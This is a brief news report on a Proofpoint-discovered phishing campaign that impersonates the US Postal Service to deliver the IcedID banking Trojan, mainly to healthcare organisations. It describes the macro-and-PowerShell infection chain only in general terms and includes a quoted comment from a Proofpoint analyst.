A new phishing campaign is making rounds across the US, looking to trick unsuspecting victims into installing a banking Trojan onto their machines. Last week, cybersecurity experts from Proofpoint have discovered a campaign in which hackers impersonate the US Postal Office as they try to distribute the IcedID banking Trojan.
This is an already known campaign, which was previously spotted in Europe, when criminals impersonated the German ministry of Finance and told their victims they're eligible for a tax refund in the amount of almost €700. Back then the were targeting financial companies and IT services companies.
Similarly as then, this time around the criminals used a lookalike .com site, verbiage, and stolen branding in emails to push the IcedID banking Trojan. However, the targets are a bit different this time around, as these emails were intended mostly for the healthcare vertical.
The scam emails carried a malicious Word file which, when opened, would trigger an Office macro and launch a PowerShell script. That script would download and install the IcedID Trojan.
Tracking countless emails across the web as they look for the source, Proofpoint says that this campaign most likely originates from a completely new actor.
"Although these campaigns are small in volume, currently, they are significant for their abuse of trusted brands, including government agencies, and for their relatively rapid expansion across multiple geographies,“ commented Threat intelligence lead at Proofpoint, Christopher Dawson.
„To date, the group appears to have targeted organizations in Germany, Italy, and, most recently, the United States, delivering geotargeted payloads with lures in local languages. We will be watching this new actor closely, given their apparent global aspirations, well-crafted social engineering, and steadily increasing scale."